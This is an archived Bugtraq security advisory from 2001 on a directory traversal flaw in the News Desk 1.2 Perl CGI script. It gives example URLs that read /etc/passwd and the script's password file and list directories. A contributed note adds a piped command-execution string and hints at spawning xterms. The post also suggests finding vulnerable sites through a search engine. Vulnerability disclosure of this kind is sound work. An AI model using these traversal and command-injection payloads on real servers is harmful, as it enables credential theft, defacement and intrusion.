Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

News Desk 1.2 CGI Vulnerbility

From: B10Z Security <path () NS SYMPATICO CA>
Date: Thu, 4 Jan 2001 01:00:17 -0000
Introduction:

News Desk 1.2 (newsdesk.cgi) is a news 
submission script which is written in perl and allows 
someone on a remote computer to connect to the 
server and post news submissions without logging 
into the actual server. By logging into the cgi with a 
custom login and password (pass.txt) the admin is 
able to post the latest headline news to his/her 
website with ease.


The Vendors website is:
http://www.ibrow.com

Problem: 

Adding the string "/../" to an URL allows an attacker to 
view any file on the server, and also list directories 
within the server which the owner of the vulnerable 
httpd has permissions to access.

Examples:

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
t=../../../../etc/passwd 
^^ = Will obviously open the passwd file, if 
unshadowed.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
t=../pass.txt 
^^ = Will open the password string which can be used 
to login to the newsdesk.cgi and post new news, or 
with special variables the ability to upload/post html to 
the htdoc's directory, possibly leading to a 
defacement of the webpage.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
t=../../../../etc/
^^ = Will obviously list the /etc/ directory. Not all 
servers will list directories, but most apear to.


Note: It depends on where they install newsdesk.cgi, 
not always in a cgi-bin, so it could be installed with 
any path. Just goto your favorite search engine and 
search for newsdesk.cgi and voila. There is also 
some other variants of this cgi script out there, most 
of them are noticeable by the news.cgi?
a=something&t=meow.html format. Notice the a= & 
t= which is a clear give-away to Newsdesk.



Solution:

Vendor has been contacted. And will release a 
updated version which is supposed to be more 
secure...


Special Thanks to:
zenomorph <http://www.cgisecurity.com>

Which contributed this:

Remote command execution is possible on most 
sites if you use the correct directory syntax such 
as ../../../bin/ls%20/| is a working example, many 
more commands are possible if you play around with 
it a bit, such as spawning xterms.

--------------------
Found By:

b10z cgi advisory.
slipy () b10z net

Found on December 10th, 2000.
Posted to BugTraq Jan 3rd, 2001.
Previous By Date Next
Previous By Thread Next

Current thread: